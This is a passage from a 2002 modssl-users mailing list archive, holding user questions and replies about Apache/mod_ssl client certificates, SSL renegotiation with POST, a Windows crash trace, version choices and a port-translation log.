-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I have a questen, what does "no client certificate CA names sent" mean? when I do a: $ openssl s_client -connect myhost.com:443 (to test out my new apache + mod_ssl server) that you can find in the output. I did make a user certificate when I did my server certificate, and I was wondering if it is possible to make apache ask for a cert, and only if it matches my database the user may proceed. // with regards // ID :: danalien :: PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 -----BEGIN PGP SIGNATURE----- Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies. iQA/AwUBPK9smx6FoQlEaqKIEQLWbwCaA4Pc0zsbbhnl+I/1d0un5XOISmkAn3tG cHHX1vuIbPpuy38iCeBjWM9H =KMR6 -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Apr 7 19:02:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA00418; Sun, 7 Apr 2002 19:01:08 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA00385; Sun, 7 Apr 2002 19:00:28 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id A245A4CE752; Sun, 7 Apr 2002 19:00:27 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g37Gl2a85542; Sun, 7 Apr 2002 18:47:02 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from blue.dedihost.com id KAA09338; Sun, 7 Apr 2002 10:48:00 +0200 (MET DST) Received: from blue.dedihost.com (localhost [127.0.0.1]) by blue.dedihost.com (8.12.1/8.12.1) with ESMTP id g378jtWj024873 for ; Sun, 7 Apr 2002 03:45:55 -0500 Received: (from robot@localhost) by blue.dedihost.com (8.12.1/8.12.1/Submit) id g378jtjc024872; Sun, 7 Apr 2002 03:45:55 -0500 Date: Sun, 7 Apr 2002 03:45:55 -0500 (CDT) From: modssl.com@robot.hey.nu X-X-Sender: robot@blue.dedihost.com To: modssl-users@modssl.org Subject: POST / SSL / Client Certificates Problem Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl.com@robot.hey.nu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm using Apache 2 beta, mod_ssl (obviously), and a few self-signed client certificates. My problem is that when I try to POST to a .cgi file, I get the following error: "Method not allowed! The POST method is not allowed for the requested URL." I've seen this error listed on quite a few pages, but I've seen no solutions... and they were all dated year 2000. Has there been any solution for this? I'm not sure what to do, but it is necessary for me to use this configuration (POST/SSL/Client Certificates). I apologize if this has been solved and I'm annoyingly asking "again".. but I've been looking all over the place for the past 2 hours and found nothing. Thanks for your time.. and I hope someone knows better than me! :) -- Dusty D. Wilson ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Apr 7 19:08:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA01058; Sun, 7 Apr 2002 19:07:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from VL-MS-MR001.sc1.videotron.ca id TAA01035; Sun, 7 Apr 2002 19:06:35 +0200 (MET DST) Received: from shodan2 ([24.200.91.45]) by VL-MS-MR001.sc1.videotron.ca (Netscape Messaging Server 4.15) with ESMTP id GU7JIW00.LN3 for ; Sun, 7 Apr 2002 13:06:32 -0400 From: "Enrico Demarin" To: Subject: RE: ModSSL 2.8.8 + Apache 1.3.24 crashing on Windows Date: Sun, 7 Apr 2002 13:07:50 -0700 Message-ID: <000c01c1de6f$e52a3810$0340a8c0@shodan2> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000D_01C1DE35.38CCE6B0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 In-Reply-To: <3CAEA80A.5EE97D86@cisco.com> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Enrico Demarin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_000D_01C1DE35.38CCE6B0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Have you tried putting KeepAlive Off in the SSL vhost ? - Enrico -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Hassan S Sent: April 5, 2002 11:47 PM To: modssl-users@modssl.org; Ralf S. Engelschall Cc: Moinak Ghosh Subject: Re: ModSSL 2.8.8 + Apache 1.3.24 crashing on Windows Importance: High Hi Ralf, I built the Apache and mod_ssl in Debug configuration to trace out this consistent problem. When I got this unreferenced memory, I clicked cancel to debug using VC++. It says "invalid memory Access" and points to the following source code. API_EXPORT(void *) ap_ctx_get(ap_ctx *ctx, char *key) { int i; ==> for (i = 0; ctx->cr_entry[i] != NULL; i++) if (strcmp(ctx->cr_entry[i]->ce_key, key) == 0) return ctx->cr_entry[i]->ce_val; return NULL; } So, ctx can be either a NULL pointer or uninitialised or corrupted memory reference for this case. Here is the full debug functional trace: ap_ctx_get(ap_ctx_rec *, char *) ssl_io_suck_read(ssl_st *, char *, int) SSL_recvwithtimeout(buff_struct *, char *, int) ssl_io_hook_recvwithtimeout(buff_struct *, char *, int) ap_hook_call_func(char *, ap_hook_entry *, ap_hook_func *) ap_hook_call(char *) buff_read(buff_struct *, void *, int) saferead_guts(buff_struct *, void *, int) read_with_errors(buff_struct *, void *, int) ap_bgets(char * int , buff_struct *) getline(char *, int, buff_struct *, int) read_request_line(request_rec *) ap_read_request(conn_rec *) child_sub_main(int) child_main(int) I understand that memory has been allocated for the request object and for the context (r->ctx) in ap_read_request as follows. And, I am pretty sure that we built under EAPI only. r = ap_pcalloc(p, sizeof(request_rec)); r->pool = p; ..... ..... #ifdef EAPI r->ctx = ap_ctx_new(r->pool); #endif /* EAPI */ Then, How come this ctx value can be NULL or invalid? Is this memory pool will be cleaned-up intermittently? By handling this exception with __try and __except block in ssl_io_suck_read, I can avoid these invalid memory reference errors. But, I want to make sure this doesn't break anything else. I feel there is some buggy code added in mod_ssl2.8.8 since I am not facing this problem with Apache1.3.20 and mod_ssl2.8.4 on the same Win2k server in SSL mode. And, please note that Apache1.3.24 is working perfectly in http mode for me. Please let me know, if you need any other information. Any help is greatly appreciated. Thanks Hassan Hassan S wrote: Hi, I have a situation where I have to redirect from a HTTP to a HTTPS connection via a servlet. That is I send a HTTP GET request to a servlet which in reply sends a redirect to a web page with the URL protocol changed to HTTPS. Till Apache 1.3.20+ModSSL 2.8.4 this was working fine. But after I upgraded to Apache 1.3.24+ModSSL 2.8.8 (to get the security fixes :) ), it is crashing with a error message like "The instruction at "0x6ff90e08" referenced memory at "0x72676f76". The memory could not be read." If I click Cancel to debug using VC++ it shows an invalid memory access in ApacheCore.dll. My platform config is Windows 2000 MS VC++ 6.0 (SP5) OpenSSL 0.9.6c (built using MASM optimizations). Please let me know where the problem is, or maybe where I should look to try and debug this. This has become a critical issue for me! Regards, Hassan. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ------=_NextPart_000_000D_01C1DE35.38CCE6B0 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Message
Have=20 you tried putting KeepAlive Off in the SSL vhost ?
 
-=20 Enrico
-----Original Message-----
From:=20 owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] = On=20 Behalf Of Hassan S
Sent: April 5, 2002 11:47 = PM
To:=20 modssl-users@modssl.org; Ralf S. Engelschall
Cc: Moinak=20 Ghosh
Subject: Re: ModSSL 2.8.8 + Apache 1.3.24 crashing on=20 Windows
Importance: High

Hi Ralf,=20

I built the Apache and mod_ssl in Debug configuration to trace out = this=20 consistent problem. When I got this unreferenced memory, I clicked = cancel to=20 debug using VC++. It says "invalid memory Access" and points to the = following=20 source code.=20

    API_EXPORT(void *) ap_ctx_get(ap_ctx *ctx, char = *key)=20
    { =
        int i;=20

=3D=3D>    for (i =3D 0; ctx->cr_entry[i] = !=3D NULL;=20 i++)=20 =
           &nb= sp;   =20 if (strcmp(ctx->cr_entry[i]->ce_key, key) =3D=3D 0)=20 =
           &nb= sp;   =20 return ctx->cr_entry[i]->ce_val;=20
        return NULL;=20
    }=20

So, ctx can be either a NULL pointer or uninitialised or corrupted = memory=20 reference for this case.=20

Here is the full debug functional trace:
ap_ctx_get(ap_ctx_rec *, char *)=20
ssl_io_suck_read(ssl_st *, char *, int)=20
SSL_recvwithtimeout(buff_struct *, char *, int)=20
ssl_io_hook_recvwithtimeout(buff_struct *, char *, int)=20
ap_hook_call_func(char *, ap_hook_entry *, ap_hook_func *)=20
ap_hook_call(char *)
buff_read(buff_struct *, void *, int)=20
saferead_guts(buff_struct *, void *, int) =
read_with_errors(buff_struct=20 *, void *, int)
ap_bgets(char * int , buff_struct *) =
getline(char *,=20 int, buff_struct *, int)
read_request_line(request_rec *) =
ap_read_request(conn_rec *) =
child_sub_main(int)=20
child_main(int)=20

I understand that memory has been allocated for the request object = and for=20 the context (r->ctx) in ap_read_request as follows. And, I am = pretty sure=20 that we built under EAPI only.=20

 r =3D ap_pcalloc(p, = sizeof(request_rec));=20
 r->pool       = ;    =20 =3D p;
.....
.....
#ifdef = EAPI=20
    r->ctx =3D=20 ap_ctx_new(r->pool);
#endif /* = EAPI=20 */=20

Then, How come this ctx value can be NULL or invalid? Is this = memory pool=20 will be cleaned-up intermittently?=20

By handling this exception with __try and  __except block in=20 ssl_io_suck_read, I can avoid these invalid memory reference errors. = But, I=20 want to make sure this doesn't break anything else.
I feel there = is some=20 buggy code added in mod_ssl2.8.8 since I am not facing this problem = with=20 Apache1.3.20 and mod_ssl2.8.4 on the same Win2k server in SSL mode. = And,=20 please note that Apache1.3.24 is working perfectly in http mode for = me. Please=20 let me know, if you need any other information.=20

Any help is greatly appreciated.=20

Thanks
Hassan=20

Hassan S wrote:=20

Hi,=20

   I have a situation where I have to redirect from a = HTTP to a=20 HTTPS
connection
via a servlet. That is I send a HTTP GET = request to=20 a servlet which in
reply sends
a redirect to a web page with = the URL=20 protocol changed to HTTPS.=20

Till Apache 1.3.20+ModSSL 2.8.4 this was working fine. But after = I=20
upgraded
to Apache 1.3.24+ModSSL 2.8.8 (to get the security = fixes :)=20 ), it is
crashing
with a error message like=20

"The instruction at "0x6ff90e08" referenced memory at = "0x72676f76". The=20
memory
could not be read."=20

If I click Cancel to debug using VC++ it shows an invalid memory = access=20
in ApacheCore.dll.=20

My platform config is=20

Windows 2000
MS VC++ 6.0 (SP5)
OpenSSL 0.9.6c (built = using MASM=20 optimizations).=20

Please let me know where the problem is, or maybe where I should = look to=20
try and
debug this. This has become a critical issue for me! =

Regards,
Hassan.=20 =

______________________________________________________________________= =20
Apache Interface to OpenSSL=20 = (mod_ssl)          &nbs= p;       =20 www.modssl.org
User Support Mailing=20 = List           &nb= sp;         =20 modssl-users@modssl.org
Automated List=20 = Manager           =             &= nbsp;   =20 majordomo@modssl.org

------=_NextPart_000_000D_01C1DE35.38CCE6B0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 01:12:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA16031; Mon, 8 Apr 2002 01:11:29 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ip9.elmar.co.il id BAA15999; Mon, 8 Apr 2002 01:10:40 +0200 (MET DST) Received: from netmask.it (ip9.elmar.co.il [192.168.1.9]) by ip9.elmar.co.il (8.11.6/8.11.6) with ESMTP id g37N9kr24788 for ; Mon, 8 Apr 2002 02:09:47 +0300 Message-ID: <3CB0D1BA.9B5012D7@netmask.it> Date: Mon, 08 Apr 2002 02:09:46 +0300 From: Eli Marmor Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL References: <01EB322D.557C3513.009AA07D@netscape.net> Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eli Marmor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Well said, and the written support from the group is long overdue, as > are the well deserved compliments. Thanks! -- Eli Marmor marmor@netmask.it CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: +972-9-766-1020 8 Yad-Harutzim St. Fax.: +972-9-766-1314 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 01:13:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA16074; Mon, 8 Apr 2002 01:12:27 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ip9.elmar.co.il id BAA16046; Mon, 8 Apr 2002 01:11:41 +0200 (MET DST) Received: from netmask.it (ip9.elmar.co.il [192.168.1.9]) by ip9.elmar.co.il (8.11.6/8.11.6) with ESMTP id g37NAnr24793 for ; Mon, 8 Apr 2002 02:10:49 +0300 Message-ID: <3CB0D1F9.23058C7B@netmask.it> Date: Mon, 08 Apr 2002 02:10:49 +0300 From: Eli Marmor Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL References: <01EB322D.557C3513.009AA07D@netscape.net> Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eli Marmor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Oops... The last message was intended personally for George Walsh, and not for the list... -- Eli Marmor marmor@netmask.it CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: +972-9-766-1020 8 Yad-Harutzim St. Fax.: +972-9-766-1314 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 01:20:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA16694; Mon, 8 Apr 2002 01:19:32 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id BAA16671; Mon, 8 Apr 2002 01:18:39 +0200 (MET DST) Received: from SAGEONE (sageone [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g37NIb138255; Sun, 7 Apr 2002 18:18:37 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020407181837.018cc580@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sun, 07 Apr 2002 18:18:37 -0500 To: modssl-users@modssl.org, modssl-users@modssl.org From: Server Admin Subject: Re: Apache 2.0.* and SSL In-Reply-To: <3CB0D1F9.23058C7B@netmask.it> References: <01EB322D.557C3513.009AA07D@netscape.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ...well, I'm keeping it for myself....! *grin* At 02:10 AM 4.8.2002 +0300, Eli Marmor wrote: >Oops... > >The last message was intended personally for George Walsh, and not for >the list... >-- >Eli Marmor >marmor@netmask.it >CTO, Founder >Netmask (El-Mar) Internet Technologies Ltd. >__________________________________________________________ >Tel.: +972-9-766-1020 8 Yad-Harutzim St. >Fax.: +972-9-766-1314 P.O.B. 7004 >Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > > .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 09:06:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA05632; Mon, 8 Apr 2002 09:05:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA05621; Mon, 8 Apr 2002 09:04:51 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 3A9D34CE731; Mon, 8 Apr 2002 09:04:51 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3874hq09430; Mon, 8 Apr 2002 09:04:43 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from blue.dedihost.com id XAA12301; Sun, 7 Apr 2002 23:57:27 +0200 (MET DST) Received: from blue.dedihost.com (localhost [127.0.0.1]) by blue.dedihost.com (8.12.1/8.12.1) with ESMTP id g37LtfWj025888 for ; Sun, 7 Apr 2002 16:55:41 -0500 Received: (from robot@localhost) by blue.dedihost.com (8.12.1/8.12.1/Submit) id g37Ltfg1025887; Sun, 7 Apr 2002 16:55:41 -0500 Date: Sun, 7 Apr 2002 16:55:41 -0500 (CDT) From: modssl.com@robot.hey.nu X-X-Sender: robot@blue.dedihost.com To: modssl-users@modssl.org Subject: Re: POST / SSL / Client Certificates Problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl.com@robot.hey.nu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I guess I should have included a little more information. The Apache log shows this error: "mod_ssl: SSL Re-negotiation in conjunction with POST method not supported!" Sorry 'bout that. Thanks! -- Dusty D. Wilson On Sun, 7 Apr 2002 modssl.com@robot.hey.nu wrote: > I'm using Apache 2 beta, mod_ssl (obviously), and a few self-signed client > certificates. > > My problem is that when I try to POST to a .cgi file, I get the following > error: > > "Method not allowed! > The POST method is not allowed for the requested URL." > > I've seen this error listed on quite a few pages, but I've seen no > solutions... and they were all dated year 2000. Has there been any > solution for this? I'm not sure what to do, but it is necessary for me to > use this configuration (POST/SSL/Client Certificates). > > I apologize if this has been solved and I'm annoyingly asking "again".. > but I've been looking all over the place for the past 2 hours and found > nothing. > > Thanks for your time.. and I hope someone knows better than me! :) > > -- > Dusty D. Wilson > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 10:38:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA10136; Mon, 8 Apr 2002 10:37:38 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from dukas.upc.es id KAA10094; Mon, 8 Apr 2002 10:36:26 +0200 (MET DST) Received: from parra.upc.es (parra.upc.es [147.83.36.80]) by dukas.upc.es (8.12.1/8.12.1) with ESMTP id g388aMgi028107 for ; Mon, 8 Apr 2002 10:36:23 +0200 (MET DST) Received: from localhost (localhost [127.0.0.1]) by parra.upc.es (Postfix) with ESMTP id 93B9761A1A for ; Mon, 8 Apr 2002 10:36:00 +0200 (MET DST) Received: from etsetb.upc.es (dalia.upc.es [147.83.36.36]) by parra.upc.es (Postfix) with ESMTP id 6260A61A22 for ; Mon, 8 Apr 2002 10:33:37 +0200 (MET DST) Message-ID: <3CB147A0.53E54204@etsetb.upc.es> Date: Mon, 08 Apr 2002 09:32:48 +0200 From: Sergi Mayordomo X-Mailer: Mozilla 4.78 [es] (X11; U; Linux 2.4.7-10 i586) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: ModSSL 2.8.8 + Apache 1.3.24 -- Change Topic References: <3CAAE892.DCE888AA@cisco.com> <3.0.5.32.20020406092343.018ca310@mail.sage-one.net> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Scanned: by AMaViS perl-10 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Sergi Mayordomo X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Server Admin escribió: > > Hello, Pardon me for modifying this topic, but I have concerns about what version of modssl to use, especially after reading this message. > > I'm new to the list and run Apache-1.3.22_1. I was looking for a modssl version that could be used with it in order to set up HTTPS for a virtual host. But, I noticed the links have all been broken or pulled for modssl release 2.8.5. Since I haven't seen the archives yet, I assume there is a good reason and I would need to update Apache and use the latest modssl. > > Can some one confirm that I should give up looking for a modssl for my version of Apache..?? Going to take several hours to upgrade.... > > Many thanks....!! > > At 01:17 PM 4.6.2002 +0530, Hassan S wrote: > >>>> > Hi Ralf, > > I built the Apache and mod_ssl in Debug configuration to trace out this consistent problem. When I got this unreferenced memory, I clicked cancel to debug using VC++. It says "invalid memory Access" and points to the following source code. > > API_EXPORT(void *) ap_ctx_get(ap_ctx *ctx, char *key) > { > int i; > > ==> for (i = 0; ctx->cr_entry[i] != NULL; i++) > if (strcmp(ctx->cr_entry[i]->ce_key, key) == 0) > return ctx->cr_entry[i]->ce_val; > return NULL; > } > > So, ctx can be either a NULL pointer or uninitialised or corrupted memory reference for this case. > > Here is the full debug functional trace: > ap_ctx_get(ap_ctx_rec *, char *) > ssl_io_suck_read(ssl_st *, char *, int) > SSL_recvwithtimeout(buff_struct *, char *, int) > ssl_io_hook_recvwithtimeout(buff_struct *, char *, int) > ap_hook_call_func(char *, ap_hook_entry *, ap_hook_func *) > ap_hook_call(char *) > buff_read(buff_struct *, void *, int) > saferead_guts(buff_struct *, void *, int) > read_with_errors(buff_struct *, void *, int) > ap_bgets(char * int , buff_struct *) > getline(char *, int, buff_struct *, int) > read_request_line(request_rec *) > ap_read_request(conn_rec *) > child_sub_main(int) > child_main(int) > > I understand that memory has been allocated for the request object and for the context (r->ctx) in ap_read_request as follows. And, I am pretty sure that we built under EAPI only. > > r = ap_pcalloc(p, sizeof(request_rec)); > r->pool = p; > ..... > ..... > #ifdef EAPI > r->ctx = ap_ctx_new(r->pool); > #endif /* EAPI */ > > Then, How come this ctx value can be NULL or invalid? Is this memory pool will be cleaned-up intermittently? > > By handling this exception with __try and __except block in ssl_io_suck_read, I can avoid these invalid memory reference errors. But, I want to make sure this doesn't break anything else. > I feel there is some buggy code added in mod_ssl2.8.8 since I am not facing this problem with Apache1.3.20 and mod_ssl2.8.4 on the same Win2k server in SSL mode. And, please note that Apache1.3.24 is working perfectly in http mode for me. Please let me know, if you need any other information. > > Any help is greatly appreciated. > > Thanks > Hassan > > Hassan S wrote: > > Hi, > > I have a situation where I have to redirect from a HTTP to a HTTPS > connection > via a servlet. That is I send a HTTP GET request to a servlet which in > reply sends > a redirect to a web page with the URL protocol changed to HTTPS. > > Till Apache 1.3.20+ModSSL 2.8.4 this was working fine. But after I > upgraded > to Apache 1.3.24+ModSSL 2.8.8 (to get the security fixes :) ), it is > crashing > with a error message like > > "The instruction at "0x6ff90e08" referenced memory at "0x72676f76". The > memory > could not be read." > > If I click Cancel to debug using VC++ it shows an invalid memory access > in ApacheCore.dll. > > My platform config is > > Windows 2000 > MS VC++ 6.0 (SP5) > OpenSSL 0.9.6c (built using MASM optimizations). > > Please let me know where the problem is, or maybe where I should look to > try and > debug this. This has become a critical issue for me! > > Regards, > Hassan. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > > <<<< > > .... our website: http://www.sage-one.net/ > > Best regards, > > Jack L. Stone > Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org Hi, I have apache-1.3.22-2 (rpm, comes with RedHat 7.2), and it works really fine with: openssl-0.9.6b-8 mod_ssl-2.8.5-1 (rpms too). In the official site(mod_ssl.org), i've seen this version is in a folder named "obsolete", i don't know if newer versions works with this apache. I supose obsolete are things that have problems(because aren't old) and have supplied them, but not very information about this is given in the web site. Bye ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 11:59:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA14846; Mon, 8 Apr 2002 11:58:36 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from trivadis.com id LAA14752; Mon, 8 Apr 2002 11:57:26 +0200 (MET DST) Received: from localhost.localdomain ([127.0.0.1] helo=lttit) by trivadis.com with smtp (Exim 3.34 #43) id 16uVtQ-0000VC-00; Mon, 08 Apr 2002 11:56:56 +0200 Date: Mon, 8 Apr 2002 11:56:55 +0200 From: Tim Tassonis To: modssl-users@modssl.org Cc: kurt.gysi@hbl.ch Subject: SSL Virtual Host with Port Translation X-Mailer: Sylpheed version 0.7.4cvs21 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Tim Tassonis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi A customer has the following setup with Apache/mod_ssl: One virtual host on port 5100, which is tranlated to port 443 by the firewall. One virtual host on port 5000, which is not translated by the firewall. Both virtual hosts use SSL Client Authentication. While the untranslated virtual host works without problems, the translated one does not. The handhsake seems to happen (the client certificate is requested and the server certificate is checked by the client), but after that, the connection is then lost. Is there a general problem with port tranlation (couldn't think of any) or has anybody expierienced similar problems? Bye Tim Log File: 07/Apr/2002 15:19:10 26023] [info] Server: Apache/1.3.24, Interface: mod_ssl/2.8.8, Library: OpenSSL/0.9.6b[07/Apr/2002 15:19:10 26023] [info] Init: 1st startup round (still not detached)[07/Apr/2002 15:19:10 26023] [info] Init: Initializing OpenSSL library[07/Apr/2002 15:19:10 26023] [info] Init: Loading certificate & private key of SSL-aware server ebanking.hbl.ch:5100[07/Apr/2002 15:19:10 26023] [info] Init: Requesting pass phrase via builtin terminal dialog[07/Apr/2002 15:19:11 26023] [info] Init: Loading certificate & private key of SSL-aware server telebanking.hbl.ch:5100[07/Apr/2002 15:19:11 26023] [info] Init: Requesting pass phrase via builtin terminal dialog[07/Apr/2002 15:19:12 26023] [info] Init: Wiped out the queried pass phrases from memory[07/Apr/2002 15:19:12 26023] [info] Init: Seeding PRNG with 136 bytes of entropy[07/Apr/2002 15:19:12 26023] [info] Init: Generating temporary RSA private keys (512/1024 bits)[07/Apr/2002 15:19:13 26023] [info] Init: Configuring temporary DH parameters (512/1024 bits)[07/Apr/2002 15:19:13 26024] [info] Init: 2nd startup round (already detached)[07/Apr/2002 15:19:13 26024] [info] Init: Reinitializing OpenSSL library[07/Apr/2002 15:19:13 26024] [info] Init: Seeding PRNG with 136 bytes of entropy[07/Apr/2002 15:19:13 26024] [info] Init: Configuring temporary RSA private keys (512/1024 bits)[07/Apr/2002 15:19:13 26024] [info] Init: Configuring temporary DH parameters (512/1024 bits)[07/Apr/2002 15:19:13 26024] [info] Init: Initializing (virtual) servers for SSL[07/Apr/2002 15:19:13 26024] [info] Init: Configuring server ebanking.hbl.ch:5100 for SSL protocol[07/Apr/2002 15:19:13 26024] [warn] Init: (ebanking.hbl.ch:5100) RSA server certificate is a CA certificate (BasicConstraints: CA == TRUE !?)[07/Apr/2002 15:19:13 26024] [info] Init: Configuring server telebanking.hbl.ch:5100 for SSL protocol[07/Apr/2002 15:19:13 26024] [info] Init: (telebanking.hbl.ch:5100) RSA server certificate enables Server Gated Cryptography (SGC)[07/Apr/2002 15:20:14 26025] [info] Connection to child 0 established (server telebanking.hbl.ch:5100, client 172.16.1.206)[07/Apr/2002 15:20:14 26025] [info] Seeding PRNG with 23177 bytes of entropy[07/Apr/2002 15:20:14 26025] [info] Connection: Client IP: 172.16.1.206, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)[07/Apr/2002 15:20:14 26025] [info] Connection to child 0 closed with standard shutdown (server telebanking.hbl.ch:5100, client 172.16.1.206)[07/Apr/2002 15:20:15 26027] [info] Connection to child 2 established (server telebanking.hbl.ch:5100, client 